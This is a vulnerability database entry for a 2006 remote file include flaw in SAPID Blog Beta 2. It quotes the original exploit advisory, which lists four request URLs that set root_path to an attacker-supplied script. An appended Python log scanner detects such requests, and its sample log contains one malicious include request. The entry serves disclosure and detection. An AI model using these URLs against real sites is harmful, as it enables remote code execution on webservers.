Vendor: SAPID Blog
By: Kacper (a.k.a Rahim)
CVSS: 8,8 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: SAPID Blog
Affected Version From: Beta 2
Affected Version To: Beta 2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability

SAPID Blog version Beta 2 is vulnerable to a remote file include vulnerability. This vulnerability is due to the 'root_path' parameter in multiple scripts not being properly sanitized before being used in an include() function call. This can be exploited to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process.

Mitigation:

Upgrade to the latest version of SAPID Blog or apply the vendor patch.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability
$$  Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Found by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Special greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_meta_info.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]


#Greetings to everyone ;-)

# milw0rm.com [2006-08-07]
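
A log check for the requests described in this advisory, as an added example that is not part of the original advisory or of SAPID Blog: it flags access-log entries that reach the four listed scripts with 'root_path' or 'GLOBALS[root_path]' in the query string. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script paths and parameter names exactly as listed in the advisory.
AFFECTED_SCRIPTS = (
    "/usr/extensions/get_blog_infochannel.inc.php",
    "/usr/extensions/get_blog_meta_info.inc.php",
    "/usr/extensions/get_infochannel.inc.php",
    "/usr/extensions/get_tree.inc.php",
)
PARAM_NAMES = {"root_path", "globals[root_path]"}
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)  # http:, ftp:, php:, data: ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return None, 'param-override' or 'remote-include' for one request target."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(AFFECTED_SCRIPTS):
        return None
    verdict = None
    # parse_qsl percent-decodes, so GLOBALS%5Broot_path%5D is matched too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in PARAM_NAMES:
            # Assumption: legitimate traffic never sets root_path from the request.
            verdict = "param-override"
            if URL_SCHEME.match(unquote(value)):  # second decode catches double encoding
                return "remote-include"
    return verdict

def scan(lines):
    """Return (line_number, verdict, client) for each suspicious access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict, line.split()[0]))
    return hits

# Constructed sample in combined log format (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2006:10:00:01 +0000] "GET /blog/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Aug/2006:10:00:05 +0000] "GET /blog/usr/extensions/get_tree.inc.php?GLOBALS%5Broot_path%5D=http%3A%2F%2Fremote.example%2Fx%3F HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Aug/2006:10:00:09 +0000] "GET /blog/usr/extensions/get_infochannel.inc.php?root_path=../../tmp/ HTTP/1.0" 200 0',
    '192.0.2.10 - - [07/Aug/2006:10:00:12 +0000] "GET /blog/search.php?q=root_path HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Parameters sent in a POST body do not appear in an access log, so this covers query-string requests only.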